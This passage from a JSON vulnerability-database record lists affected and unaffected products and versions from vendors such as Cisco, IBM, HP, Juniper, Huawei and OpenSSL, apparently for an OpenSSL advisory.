"scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19200" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.3" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hsr6602 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.0" }, { "model": "msr93x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "secure analytics 2014.2r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.6" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "junos 12.1r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "simatic s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.5.0" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "msr50 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "virusscan enterprise for linux", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.7.1" }, { "model": "strm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.4" }, { "model": "msr50 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "junos 12.1x45-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "junos 13.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "junos 13.2r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "u200s and cs family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "security threat response manager 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "hsr6800 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v5)0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.12" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "simatic s7-1500", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.6" }, { "model": "strm/jsa 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ngfw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.3" }, { "model": "junos 10.4r16", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msr9xx russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.3r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.203" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr50-g2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "junos 5.0r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "junos 12.1x44-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "11.16" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "virusscan enterprise for linux", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.8" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "junos os 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uacos c5.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 13.1r.3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58000" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.7" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "junos os 12.1x46-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v20" }, { "model": "junos 12.1x45-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "uacos c5.0", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7755" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "imc uam", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 10.4s", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v7)0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 11.4r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "project openssl l", "scope": "eq", 